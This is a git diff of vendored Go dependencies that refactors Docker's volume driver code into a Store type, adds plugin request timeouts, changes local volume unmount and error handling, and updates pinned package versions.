-github.com/hashicorp/go-memdb 608dda3b1410a73eaf3ac8b517c9ae7ebab6aa87
-github.com/hashicorp/go-immutable-radix 8e8ed81f8f0bf1bdd829593fdd5c29922c1ea990
+github.com/hashicorp/go-memdb cb9a474f84cc5e41b273b20c6927680b2a8776ad
+github.com/hashicorp/go-immutable-radix 826af9ccf0feeee615d546d69b11f8e98da8c8f1 git://github.com/tonistiigi/go-immutable-radix.git
 github.com/hashicorp/golang-lru a0d98a5f288019575c6d1f4bb1573fef2d1fcdc4
 github.com/coreos/pkg fa29b1d70f0beaddd4c7021607cc3c3be8ce94b8
 github.com/pivotal-golang/clock 3fd3c1944c59d9742e1cd333672181cd1a6f9fa0
@@ -119,22 +142,23 @@ github.com/beorn7/perks 4c0e84591b9aa9e6dcfdf3e020114cd81f89d5f9
 github.com/prometheus/client_model fa8ad6fec33561be4280a8f0514318c79d7f6cb6
 github.com/prometheus/common ebdfc6da46522d58825777cf1f90490a5b1ef1d8
 github.com/prometheus/procfs abf152e5f3e97f2fafac028d2cc06c1feb87ffa5
-bitbucket.org/ww/goautoneg 75cd24fc2f2c2a2088577d12123ddee5f54e0675
-github.com/matttproud/golang_protobuf_extensions fc2b8d3a73c4867e51861bbdd5ae3c1f0869dd6a
+github.com/matttproud/golang_protobuf_extensions v1.0.0
 github.com/pkg/errors 839d9e913e063e28dfd0e6c7b7512793e0a48be9
+github.com/grpc-ecosystem/go-grpc-prometheus 6b7015e65d366bf3f19b2b2a000a831940f0f7e0
 
 # cli
-github.com/spf13/cobra v1.5 https://github.com/dnephin/cobra.git
-github.com/spf13/pflag dabebe21bf790f782ea4c7bbd2efc430de182afd
+github.com/spf13/cobra v0.0.3
+github.com/spf13/pflag v1.0.1
 github.com/inconshreveable/mousetrap 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75
-github.com/flynn-archive/go-shlex 3f9db97f856818214da2e1057f8ad84803971cff
+github.com/Nvveen/Gotty a8b993ba6abdb0e0c12b0125c603323a71c7790c https://github.com/ijc25/Gotty
 
 # metrics
-github.com/docker/go-metrics 86138d05f285fd9737a99bee2d9be30866b59d72
-
-# composefile
-github.com/mitchellh/mapstructure f3009df150dadf309fdee4a54ed65c124afad715
-github.com/xeipuuv/gojsonpointer e0fe6f68307607d540ed8eac07a342c33fa1b54a
-github.com/xeipuuv/gojsonreference e02fc20de94c78484cd5ffb007f8af96be030a45
-github.com/xeipuuv/gojsonschema 93e72a773fade158921402d6a24c819b48aba29d
-gopkg.in/yaml.v2 a83829b6f1293c91addabc89d0571c246397bbf4
+github.com/docker/go-metrics d466d4f6fd960e01820085bd7e1a24426ee7ef18
+
+github.com/opencontainers/selinux b29023b86e4a69d1b46b7e7b4e2b6fda03f0b9cd
+
+
+# archive/tar (for Go 1.10, see https://github.com/golang/go/issues/24787)
+# mkdir -p ./vendor/archive
+# git clone -b go-1.10 --depth=1 git@github.com:kolyshkin/go-tar.git ./vendor/archive/tar
+# vndr # to clean up test files
diff --git a/vendor/github.com/docker/docker/volume/drivers/adapter.go b/vendor/github.com/docker/docker/volume/drivers/adapter.go
index 62ef7dfe60..f6ee07a006 100644
--- a/vendor/github.com/docker/docker/volume/drivers/adapter.go
+++ b/vendor/github.com/docker/docker/volume/drivers/adapter.go
@@ -1,12 +1,12 @@
-package volumedrivers
+package drivers // import "github.com/docker/docker/volume/drivers"
 
 import (
 	"errors"
-	"path/filepath"
 	"strings"
+	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/volume"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -15,9 +15,9 @@ var (
 
 type volumeDriverAdapter struct {
 	name         string
-	baseHostPath string
+	scopePath    func(s string) string
 	capabilities *volume.Capability
-	proxy        *volumeDriverProxy
+	proxy        volumeDriver
 }
 
 func (a *volumeDriverAdapter) Name() string {
@@ -29,10 +29,10 @@ func (a *volumeDriverAdapter) Create(name string, opts map[string]string) (volum
 		return nil, err
 	}
 	return &volumeAdapter{
-		proxy:        a.proxy,
-		name:         name,
-		driverName:   a.name,
-		baseHostPath: a.baseHostPath,
+		proxy:      a.proxy,
+		name:       name,
+		driverName: a.name,
+		scopePath:  a.scopePath,
 	}, nil
 }
 
@@ -40,13 +40,6 @@ func (a *volumeDriverAdapter) Remove(v volume.Volume) error {
 	return a.proxy.Remove(v.Name())
 }
 
-func hostPath(baseHostPath, path string) string {
-	if baseHostPath != "" {
-		path = filepath.Join(baseHostPath, path)
-	}
-	return path
-}
-
 func (a *volumeDriverAdapter) List() ([]volume.Volume, error) {
 	ls, err := a.proxy.List()
 	if err != nil {
@@ -56,11 +49,11 @@ func (a *volumeDriverAdapter) List() ([]volume.Volume, error) {
 	var out []volume.Volume
 	for _, vp := range ls {
 		out = append(out, &volumeAdapter{
-			proxy:        a.proxy,
-			name:         vp.Name,
-			baseHostPath: a.baseHostPath,
-			driverName:   a.name,
-			eMount:       hostPath(a.baseHostPath, vp.Mountpoint),
+			proxy:      a.proxy,
+			name:       vp.Name,
+			scopePath:  a.scopePath,
+			driverName: a.name,
+			eMount:     a.scopePath(vp.Mountpoint),
 		})
 	}
 	return out, nil
@@ -78,12 +71,13 @@ func (a *volumeDriverAdapter) Get(name string) (volume.Volume, error) {
 	}
 
 	return &volumeAdapter{
-		proxy:        a.proxy,
-		name:         v.Name,
-		driverName:   a.Name(),
-		eMount:       v.Mountpoint,
-		status:       v.Status,
-		baseHostPath: a.baseHostPath,
+		proxy:      a.proxy,
+		name:       v.Name,
+		driverName: a.Name(),
+		eMount:     v.Mountpoint,
+		createdAt:  v.CreatedAt,
+		status:     v.Status,
+		scopePath:  a.scopePath,
 	}, nil
 }
 
@@ -100,7 +94,7 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability {
 	if err != nil {
 		// `GetCapabilities` is a not a required endpoint.
 		// On error assume it's a local-only driver
-		logrus.Warnf("Volume driver %s returned an error while trying to query its capabilities, using default capabilties: %v", a.name, err)
+		logrus.WithError(err).WithField("driver", a.name).Debug("Volume driver returned an error while trying to query its capabilities, using default capabilities")
 		return volume.Capability{Scope: volume.LocalScope}
 	}
 
@@ -111,7 +105,7 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability {
 
 	cap.Scope = strings.ToLower(cap.Scope)
 	if cap.Scope != volume.LocalScope && cap.Scope != volume.GlobalScope {
-		logrus.Warnf("Volume driver %q returned an invalid scope: %q", a.Name(), cap.Scope)
+		logrus.WithField("driver", a.Name()).WithField("scope", a.Scope).Warn("Volume driver returned an invalid scope")
 		cap.Scope = volume.LocalScope
 	}
 
@@ -120,17 +114,19 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability {
 }
 
 type volumeAdapter struct {
-	proxy        *volumeDriverProxy
-	name         string
-	baseHostPath string
-	driverName   string
-	eMount       string // ephemeral host volume path
-	status       map[string]interface{}
+	proxy      volumeDriver
+	name       string
+	scopePath  func(string) string
+	driverName string
+	eMount     string    // ephemeral host volume path
+	createdAt  time.Time // time the directory was created
+	status     map[string]interface{}
 }
 
 type proxyVolume struct {
 	Name       string
 	Mountpoint string
+	CreatedAt  time.Time
 	Status     map[string]interface{}
 }
 
@@ -145,7 +141,7 @@ func (a *volumeAdapter) DriverName() string {
 func (a *volumeAdapter) Path() string {
 	if len(a.eMount) == 0 {
 		mountpoint, _ := a.proxy.Path(a.name)
-		a.eMount = hostPath(a.baseHostPath, mountpoint)
+		a.eMount = a.scopePath(mountpoint)
 	}
 	return a.eMount
 }
@@ -156,7 +152,7 @@ func (a *volumeAdapter) CachedPath() string {
 
 func (a *volumeAdapter) Mount(id string) (string, error) {
 	mountpoint, err := a.proxy.Mount(a.name, id)
-	a.eMount = hostPath(a.baseHostPath, mountpoint)
+	a.eMount = a.scopePath(mountpoint)
 	return a.eMount, err
 }
 
@@ -168,6 +164,9 @@ func (a *volumeAdapter) Unmount(id string) error {
 	return err
 }
 
+func (a *volumeAdapter) CreatedAt() (time.Time, error) {
+	return a.createdAt, nil
+}
 func (a *volumeAdapter) Status() map[string]interface{} {
 	out := make(map[string]interface{}, len(a.status))
 	for k, v := range a.status {
diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint.go b/vendor/github.com/docker/docker/volume/drivers/extpoint.go
index 576dee8a1b..b2131c20ef 100644
--- a/vendor/github.com/docker/docker/volume/drivers/extpoint.go
+++ b/vendor/github.com/docker/docker/volume/drivers/extpoint.go
@@ -1,35 +1,27 @@
 //go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver
 
-package volumedrivers
+package drivers // import "github.com/docker/docker/volume/drivers"
 
 import (
 	"fmt"
+	"sort"
 	"sync"
 
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/locker"
 	getter "github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
 	"github.com/docker/docker/volume"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
-// currently created by hand. generation tool would generate this like:
-// $ extpoint-gen Driver > volume/extpoint.go
-
-var drivers = &driverExtpoint{
-	extensions: make(map[string]volume.Driver),
-	driverLock: &locker.Locker{},
-}
-
 const extName = "VolumeDriver"
 
-// NewVolumeDriver returns a driver has the given name mapped on the given client.
-func NewVolumeDriver(name string, baseHostPath string, c client) volume.Driver {
-	proxy := &volumeDriverProxy{c}
-	return &volumeDriverAdapter{name: name, baseHostPath: baseHostPath, proxy: proxy}
-}
-
 // volumeDriver defines the available functions that volume plugins must implement.
 // This interface is only defined to generate the proxy objects.
 // It's not intended to be public or reused.
+// nolint: deadcode
 type volumeDriver interface {
 	// Create a volume with the given name
 	Create(name string, opts map[string]string) (err error)
@@ -49,87 +41,75 @@ type volumeDriver interface {
 	Capabilities() (capabilities volume.Capability, err error)
 }
 
-type driverExtpoint struct {
-	extensions map[string]volume.Driver
-	sync.Mutex
+// Store is an in-memory store for volume drivers
+type Store struct {
+	extensions   map[string]volume.Driver
+	mu           sync.Mutex
 	driverLock   *locker.Locker
-	plugingetter getter.PluginGetter
-}
-
-// RegisterPluginGetter sets the plugingetter
-func RegisterPluginGetter(plugingetter getter.PluginGetter) {
-	drivers.plugingetter = plugingetter
+	pluginGetter getter.PluginGetter
 }
 
-// Register associates the given driver to the given name, checking if
-// the name is already associated
-func Register(extension volume.Driver, name string) bool {
-	if name == "" {
-		return false
-	}
-
-	drivers.Lock()
-	defer drivers.Unlock()
-
-	_, exists := drivers.extensions[name]
-	if exists {
-		return false
-	}
-
-	if err := validateDriver(extension); err != nil {
-		return false
+// NewStore creates a new volume driver store
+func NewStore(pg getter.PluginGetter) *Store {
+	return &Store{
+		extensions:   make(map[string]volume.Driver),
+		driverLock:   locker.New(),
+		pluginGetter: pg,
 	}
-
-	drivers.extensions[name] = extension
-
-	return true
 }
 
-// Unregister dissociates the name from its driver, if the association exists.
-func Unregister(name string) bool {
-	drivers.Lock()
-	defer drivers.Unlock()
+type driverNotFoundError string
 
-	_, exists := drivers.extensions[name]
-	if !exists {
-		return false
-	}
-	delete(drivers.extensions, name)
-	return true
+func (e driverNotFoundError) Error() string {
+	return "volume driver not found: " + string(e)
 }
 
+func (driverNotFoundError) NotFound() {}
+
 // lookup returns the driver associated with the given name. If a
 // driver with the given name has not been registered it checks if
 // there is a VolumeDriver plugin available with the given name.
-func lookup(name string, mode int) (volume.Driver, error) {
-	drivers.driverLock.Lock(name)
-	defer drivers.driverLock.Unlock(name)
+func (s *Store) lookup(name string, mode int) (volume.Driver, error) {
+	if name == "" {
+		return nil, errdefs.InvalidParameter(errors.New("driver name cannot be empty"))
+	}
+	s.driverLock.Lock(name)
+	defer s.driverLock.Unlock(name)
 
-	drivers.Lock()
-	ext, ok := drivers.extensions[name]
-	drivers.Unlock()
+	s.mu.Lock()
+	ext, ok := s.extensions[name]
+	s.mu.Unlock()
 	if ok {
 		return ext, nil
 	}
-	if drivers.plugingetter != nil {
-		p, err := drivers.plugingetter.Get(name, extName, mode)
+	if s.pluginGetter != nil {
+		p, err := s.pluginGetter.Get(name, extName, mode)
 		if err != nil {
-			return nil, fmt.Errorf("Error looking up volume plugin %s: %v", name, err)
+			return nil, errors.Wrap(err, "error looking up volume plugin "+name)
 		}
 
-		d := NewVolumeDriver(p.Name(), p.BasePath(), p.Client())
+		d, err := makePluginAdapter(p)
+		if err != nil {
+			return nil, errors.Wrap(err, "error making plugin client")
+		}
 		if err := validateDriver(d); err != nil {
+			if mode > 0 {
+				// Undo any reference count changes from the initial `Get`
+				if _, err := s.pluginGetter.Get(name, extName, mode*-1); err != nil {
+					logrus.WithError(err).WithField("action", "validate-driver").WithField("plugin", name).Error("error releasing reference to plugin")
+				}
+			}
 			return nil, err
 		}
 
 		if p.IsV1() {
-			drivers.Lock()
-			drivers.extensions[name] = d
-			drivers.Unlock()
+			s.mu.Lock()
+			s.extensions[name] = d
+			s.mu.Unlock()
 		}
 		return d, nil
 	}
-	return nil, fmt.Errorf("Error looking up volume plugin %s", name)
+	return nil, driverNotFoundError(name)
 }
 
 func validateDriver(vd volume.Driver) error {
@@ -140,76 +120,116 @@ func validateDriver(vd volume.Driver) error {
 	return nil
 }
 
-// GetDriver returns a volume driver by its name.
-// If the driver is empty, it looks for the local driver.
-func GetDriver(name string) (volume.Driver, error) {
+// Register associates the given driver to the given name, checking if
+// the name is already associated
+func (s *Store) Register(d volume.Driver, name string) bool {
 	if name == "" {
-		name = volume.DefaultDriverName
+		return false
+	}
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	if _, exists := s.extensions[name]; exists {
+		return false
+	}
+
+	if err := validateDriver(d); err != nil {
+		return false
 	}
-	return lookup(name, getter.LOOKUP)
+
+	s.extensions[name] = d
+	return true
+}
+
+// GetDriver returns a volume driver by its name.
+// If the driver is empty, it looks for the local driver.
+func (s *Store) GetDriver(name string) (volume.Driver, error) {
+	return s.lookup(name, getter.Lookup)
 }
 
 // CreateDriver returns a volume driver by its name and increments RefCount.
 // If the driver is empty, it looks for the local driver.
-func CreateDriver(name string) (volume.Driver, error) {
-	if name == "" {
-		name = volume.DefaultDriverName
-	}
-	return lookup(name, getter.ACQUIRE)
+func (s *Store) CreateDriver(name string) (volume.Driver, error) {
+	return s.lookup(name, getter.Acquire)
 }
 
-// RemoveDriver returns a volume driver by its name and decrements RefCount..
+// ReleaseDriver returns a volume driver by its name and decrements RefCount..
 // If the driver is empty, it looks for the local driver.
-func RemoveDriver(name string) (volume.Driver, error) {
-	if name == "" {
-		name = volume.DefaultDriverName
-	}
-	return lookup(name, getter.RELEASE)
+func (s *Store) ReleaseDriver(name string) (volume.Driver, error) {
+	return s.lookup(name, getter.Release)
 }
 
 // GetDriverList returns list of volume drivers registered.
 // If no driver is registered, empty string list will be returned.
-func GetDriverList() []string {
+func (s *Store) GetDriverList() []string {
 	var driverList []string
-	drivers.Lock()
-	for driverName := range drivers.extensions {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	for driverName := range s.extensions {
 		driverList = append(driverList, driverName)
 	}
-	drivers.Unlock()
+	sort.Strings(driverList)
 	return driverList
 }
 
 // GetAllDrivers lists all the registered drivers
-func GetAllDrivers() ([]volume.Driver, error) {
+func (s *Store) GetAllDrivers() ([]volume.Driver, error) {
 	var plugins []getter.CompatPlugin
-	if drivers.plugingetter != nil {
+	if s.pluginGetter != nil {
 		var err error
-		plugins, err = drivers.plugingetter.GetAllByCap(extName)
+		plugins, err = s.pluginGetter.GetAllByCap(extName)
 		if err != nil {
 			return nil, fmt.Errorf("error listing plugins: %v", err)
 		}
 	}
 	var ds []volume.Driver
 
-	drivers.Lock()
-	defer drivers.Unlock()
+	s.mu.Lock()
+	defer s.mu.Unlock()
 
-	for _, d := range drivers.extensions {
+	for _, d := range s.extensions {
 		ds = append(ds, d)
 	}
 
 	for _, p := range plugins {
 		name := p.Name()
-		ext, ok := drivers.extensions[name]
-		if ok {
+
+		if _, ok := s.extensions[name]; ok {
 			continue
 		}
 
-		ext = NewVolumeDriver(name, p.BasePath(), p.Client())
+		ext, err := makePluginAdapter(p)
+		if err != nil {
+			return nil, errors.Wrap(err, "error making plugin client")
+		}
 		if p.IsV1() {
-			drivers.extensions[name] = ext
+			s.extensions[name] = ext
 		}
 		ds = append(ds, ext)
 	}
 	return ds, nil
 }
+
+func makePluginAdapter(p getter.CompatPlugin) (*volumeDriverAdapter, error) {
+	if pc, ok := p.(getter.PluginWithV1Client); ok {
+		return &volumeDriverAdapter{name: p.Name(), scopePath: p.ScopedPath, proxy: &volumeDriverProxy{pc.Client()}}, nil
+	}
+
+	pa, ok := p.(getter.PluginAddr)
+	if !ok {
+		return nil, errdefs.System(errors.Errorf("got unknown plugin instance %T", p))
+	}
+
+	if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 {
+		return nil, errors.Errorf("plugin protocol not supported: %s", p)
+	}
+
+	addr := pa.Addr()
+	client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout())
+	if err != nil {
+		return nil, errors.Wrap(err, "error creating plugin client")
+	}
+
+	return &volumeDriverAdapter{name: p.Name(), scopePath: p.ScopedPath, proxy: &volumeDriverProxy{client}}, nil
+}
diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go
index 428b0752f2..384742ea00 100644
--- a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go
+++ b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go
@@ -1,4 +1,4 @@
-package volumedrivers
+package drivers // import "github.com/docker/docker/volume/drivers"
 
 import (
 	"testing"
@@ -7,13 +7,14 @@ import (
 )
 
 func TestGetDriver(t *testing.T) {
-	_, err := GetDriver("missing")
+	s := NewStore(nil)
+	_, err := s.GetDriver("missing")
 	if err == nil {
 		t.Fatal("Expected error, was nil")
 	}
-	Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	s.Register(volumetestutils.NewFakeDriver("fake"), "fake")
 
-	d, err := GetDriver("fake")
+	d, err := s.GetDriver("fake")
 	if err != nil {
 		t.Fatal(err)
 	}
diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy.go b/vendor/github.com/docker/docker/volume/drivers/proxy.go
index b23db6258f..8a44faeddc 100644
--- a/vendor/github.com/docker/docker/volume/drivers/proxy.go
+++ b/vendor/github.com/docker/docker/volume/drivers/proxy.go
@@ -1,15 +1,22 @@
 // generated code - DO NOT EDIT
 
-package volumedrivers
+package drivers // import "github.com/docker/docker/volume/drivers"
 
 import (
 	"errors"
+	"time"
 
+	"github.com/docker/docker/pkg/plugins"
 	"github.com/docker/docker/volume"
 )
 
+const (
+	longTimeout  = 2 * time.Minute
+	shortTimeout = 1 * time.Minute
+)
+
 type client interface {
-	Call(string, interface{}, interface{}) error
+	CallWithOptions(string, interface{}, interface{}, ...func(*plugins.RequestOpts)) error
 }
 
 type volumeDriverProxy struct {
@@ -33,7 +40,8 @@ func (pp *volumeDriverProxy) Create(name string, opts map[string]string) (err er
 
 	req.Name = name
 	req.Opts = opts
-	if err = pp.Call("VolumeDriver.Create", req, &ret); err != nil {
+
+	if err = pp.CallWithOptions("VolumeDriver.Create", req, &ret, plugins.WithRequestTimeout(longTimeout)); err != nil {
 		return
 	}
 
@@ -59,7 +67,8 @@ func (pp *volumeDriverProxy) Remove(name string) (err error) {
 	)
 
 	req.Name = name
-	if err = pp.Call("VolumeDriver.Remove", req, &ret); err != nil {
+
+	if err = pp.CallWithOptions("VolumeDriver.Remove", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil {
 		return
 	}
 
@@ -86,7 +95,8 @@ func (pp *volumeDriverProxy) Path(name string) (mountpoint string, err error) {
 	)
 
 	req.Name = name
-	if err = pp.Call("VolumeDriver.Path", req, &ret); err != nil {
+
+	if err = pp.CallWithOptions("VolumeDriver.Path", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil {
 		return
 	}
 
@@ -117,7 +127,8 @@ func (pp *volumeDriverProxy) Mount(name string, id string) (mountpoint string, e
 
 	req.Name = name
 	req.ID = id
-	if err = pp.Call("VolumeDriver.Mount", req, &ret); err != nil {
+
+	if err = pp.CallWithOptions("VolumeDriver.Mount", req, &ret, plugins.WithRequestTimeout(longTimeout)); err != nil {
 		return
 	}
 
@@ -147,7 +158,8 @@ func (pp *volumeDriverProxy) Unmount(name string, id string) (err error) {
 
 	req.Name = name
 	req.ID = id
-	if err = pp.Call("VolumeDriver.Unmount", req, &ret); err != nil {
+
+	if err = pp.CallWithOptions("VolumeDriver.Unmount", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil {
 		return
 	}
 
@@ -172,7 +184,7 @@ func (pp *volumeDriverProxy) List() (volumes []*proxyVolume, err error) {
 		ret volumeDriverProxyListResponse
 	)
 
-	if err = pp.Call("VolumeDriver.List", req, &ret); err != nil {
+	if err = pp.CallWithOptions("VolumeDriver.List", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil {
 		return
 	}
 
@@ -201,7 +213,8 @@ func (pp *volumeDriverProxy) Get(name string) (volume *proxyVolume, err error) {
 	)
 
 	req.Name = name
-	if err = pp.Call("VolumeDriver.Get", req, &ret); err != nil {
+
+	if err = pp.CallWithOptions("VolumeDriver.Get", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil {
 		return
 	}
 
@@ -228,7 +241,7 @@ func (pp *volumeDriverProxy) Capabilities() (capabilities volume.Capability, err
 		ret volumeDriverProxyCapabilitiesResponse
 	)
 
-	if err = pp.Call("VolumeDriver.Capabilities", req, &ret); err != nil {
+	if err = pp.CallWithOptions("VolumeDriver.Capabilities", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil {
 		return
 	}
 
diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go
index b78c46a036..79af956333 100644
--- a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go
+++ b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go
@@ -1,4 +1,4 @@
-package volumedrivers
+package drivers // import "github.com/docker/docker/volume/drivers"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/volume/local/local.go b/vendor/github.com/docker/docker/volume/local/local.go
index 62c45e69ea..d97347423a 100644
--- a/vendor/github.com/docker/docker/volume/local/local.go
+++ b/vendor/github.com/docker/docker/volume/local/local.go
@@ -1,7 +1,7 @@
 // Package local provides the default implementation for volumes. It
 // is used to mount data volume containers and directories local to
 // the host server.
-package local
+package local // import "github.com/docker/docker/volume/local"
 
 import (
 	"encoding/json"
@@ -13,13 +13,12 @@ import (
 	"strings"
 	"sync"
 
-	"github.com/pkg/errors"
-
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/names"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/mount"
-	"github.com/docker/docker/utils"
 	"github.com/docker/docker/volume"
+	"github.com/pkg/errors"
 )
 
 // VolumeDataPathName is the name of the directory where the volume data is stored.
@@ -36,17 +35,9 @@ var (
 	// volumeNameRegex ensures the name assigned for the volume is valid.
 	// This name is used to create the bind directory, so we need to avoid characters that
 	// would make the path to escape the root directory.
-	volumeNameRegex = utils.RestrictedNamePattern
+	volumeNameRegex = names.RestrictedNamePattern
 )
 
-type validationError struct {
-	error
-}
-
-func (validationError) IsValidationError() bool {
-	return true
-}
-
 type activeMount struct {
 	count   uint64
 	mounted bool
@@ -55,10 +46,10 @@ type activeMount struct {
 // New instantiates a new Root instance with the provided scope. Scope
 // is the base path that the Root instance uses to store its
 // volumes. The base path is created here if it does not exist.
-func New(scope string, rootUID, rootGID int) (*Root, error) {
+func New(scope string, rootIDs idtools.IDPair) (*Root, error) {
 	rootDirectory := filepath.Join(scope, volumesPathName)
 
-	if err := idtools.MkdirAllAs(rootDirectory, 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAllAndChown(rootDirectory, 0700, rootIDs); err != nil {
 		return nil, err
 	}
 
@@ -66,8 +57,7 @@ func New(scope string, rootUID, rootGID int) (*Root, error) {
 		scope:   scope,
 		path:    rootDirectory,
 		volumes: make(map[string]*localVolume),
-		rootUID: rootUID,
-		rootGID: rootGID,
+		rootIDs: rootIDs,
 	}
 
 	dirs, err := ioutil.ReadDir(rootDirectory)
@@ -75,11 +65,6 @@ func New(scope string, rootUID, rootGID int) (*Root, error) {
 		return nil, err
 	}
 
-	mountInfos, err := mount.GetMounts()
-	if err != nil {
-		logrus.Debugf("error looking up mounts for local volume cleanup: %v", err)
-	}
-
 	for _, d := range dirs {
 		if !d.IsDir() {
 			continue
@@ -105,12 +90,7 @@ func New(scope string, rootUID, rootGID int) (*Root, error) {
 			}
 
 			// unmount anything that may still be mounted (for example, from an unclean shutdown)
-			for _, info := range mountInfos {
-				if info.Mountpoint == v.path {
-					mount.Unmount(v.path)
-					break
-				}
-			}
+			mount.Unmount(v.path)
 		}
 	}
 
@@ -125,8 +105,7 @@ type Root struct {
 	scope   string
 	path    string
 	volumes map[string]*localVolume
-	rootUID int
-	rootGID int
+	rootIDs idtools.IDPair
 }
 
 // List lists all the volumes
@@ -167,11 +146,8 @@ func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error
 	}
 
 	path := r.DataPath(name)
-	if err := idtools.MkdirAllAs(path, 0755, r.rootUID, r.rootGID); err != nil {
-		if os.IsExist(err) {
-			return nil, fmt.Errorf("volume already exists under %s", filepath.Dir(path))
-		}
-		return nil, errors.Wrapf(err, "error while creating volume path '%s'", path)
+	if err := idtools.MkdirAllAndChown(path, 0755, r.rootIDs); err != nil {
+		return nil, errors.Wrapf(errdefs.System(err), "error while creating volume path '%s'", path)
 	}
 
 	var err error
@@ -197,7 +173,7 @@ func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error
 			return nil, err
 		}
 		if err = ioutil.WriteFile(filepath.Join(filepath.Dir(path), "opts.json"), b, 600); err != nil {
-			return nil, errors.Wrap(err, "error while persisting volume options")
+			return nil, errdefs.System(errors.Wrap(err, "error while persisting volume options"))
 		}
 	}
 
@@ -215,7 +191,15 @@ func (r *Root) Remove(v volume.Volume) error {
 
 	lv, ok := v.(*localVolume)
 	if !ok {
-		return fmt.Errorf("unknown volume type %T", v)
+		return errdefs.System(errors.Errorf("unknown volume type %T", v))
+	}
+
+	if lv.active.count > 0 {
+		return errdefs.System(errors.Errorf("volume has active mounts"))
+	}
+
+	if err := lv.unmount(); err != nil {
+		return err
 	}
 
 	realPath, err := filepath.EvalSymlinks(lv.path)
@@ -227,7 +211,7 @@ func (r *Root) Remove(v volume.Volume) error {
 	}
 
 	if !r.scopedPath(realPath) {
-		return fmt.Errorf("Unable to remove a directory of out the Docker root %s: %s", r.scope, realPath)
+		return errdefs.System(errors.Errorf("Unable to remove a directory outside of the local volume root %s: %s", r.scope, realPath))
 	}
 
 	if err := removePath(realPath); err != nil {
@@ -243,7 +227,7 @@ func removePath(path string) error {
 		if os.IsNotExist(err) {
 			return nil
 		}
-		return errors.Wrapf(err, "error removing volume path '%s'", path)
+		return errdefs.System(errors.Wrapf(err, "error removing volume path '%s'", path))
 	}
 	return nil
 }
@@ -264,12 +248,20 @@ func (r *Root) Scope() string {
 	return volume.LocalScope
 }
 
+type validationError string
+
+func (e validationError) Error() string {
+	return string(e)
+}
+
+func (e validationError) InvalidParameter() {}
+
 func (r *Root) validateName(name string) error {
 	if len(name) == 1 {
-		return validationError{fmt.Errorf("volume name is too short, names should be at least two alphanumeric characters")}
+		return validationError("volume name is too short, names should be at least two alphanumeric characters")
 	}
 	if !volumeNameRegex.MatchString(name) {
-		return validationError{fmt.Errorf("%q includes invalid characters for a local volume name, only %q are allowed. If you intented to pass a host directory, use absolute path", name, utils.RestrictedNameChars)}
+		return validationError(fmt.Sprintf("%q includes invalid characters for a local volume name, only %q are allowed. If you intended to pass a host directory, use absolute path", name, names.RestrictedNameChars))
 	}
 	return nil
 }
@@ -305,14 +297,20 @@ func (v *localVolume) Path() string {
 	return v.path
 }
 
+// CachedPath returns the data location
+func (v *localVolume) CachedPath() string {
+	return v.path
+}
+
 // Mount implements the localVolume interface, returning the data location.
+// If there are any provided mount options, the resources will be mounted at this point
 func (v *localVolume) Mount(id string) (string, error) {
 	v.m.Lock()
 	defer v.m.Unlock()
 	if v.opts != nil {
 		if !v.active.mounted {
 			if err := v.mount(); err != nil {
-				return "", err
+				return "", errdefs.System(err)
 			}
 			v.active.mounted = true
 		}
@@ -321,19 +319,35 @@ func (v *localVolume) Mount(id string) (string, error) {
 	return v.path, nil
 }
 
-// Umount is for satisfying the localVolume interface and does not do anything in this driver.
+// Unmount dereferences the id, and if it is the last reference will unmount any resources
+// that were previously mounted.
 func (v *localVolume) Unmount(id string) error {
 	v.m.Lock()
 	defer v.m.Unlock()
+
+	// Always decrement the count, even if the unmount fails
+	// Essentially docker doesn't care if this fails, it will send an error, but
+	// ultimately there's nothing that can be done. If we don't decrement the count
+	// this volume can never be removed until a daemon restart occurs.
 	if v.opts != nil {
 		v.active.count--
-		if v.active.count == 0 {
-			if err := mount.Unmount(v.path); err != nil {
-				v.active.count++
-				return errors.Wrapf(err, "error while unmounting volume path '%s'", v.path)
+	}
+
+	if v.active.count > 0 {
+		return nil
+	}
+
+	return v.unmount()
+}
+
+func (v *localVolume) unmount() error {
+	if v.opts != nil {
+		if err := mount.Unmount(v.path); err != nil {
+			if mounted, mErr := mount.Mounted(v.path); mounted || mErr != nil {
+				return errdefs.System(errors.Wrapf(err, "error while unmounting volume path '%s'", v.path))
 			}
-			v.active.mounted = false
 		}
+		v.active.mounted = false
 	}
 	return nil
 }
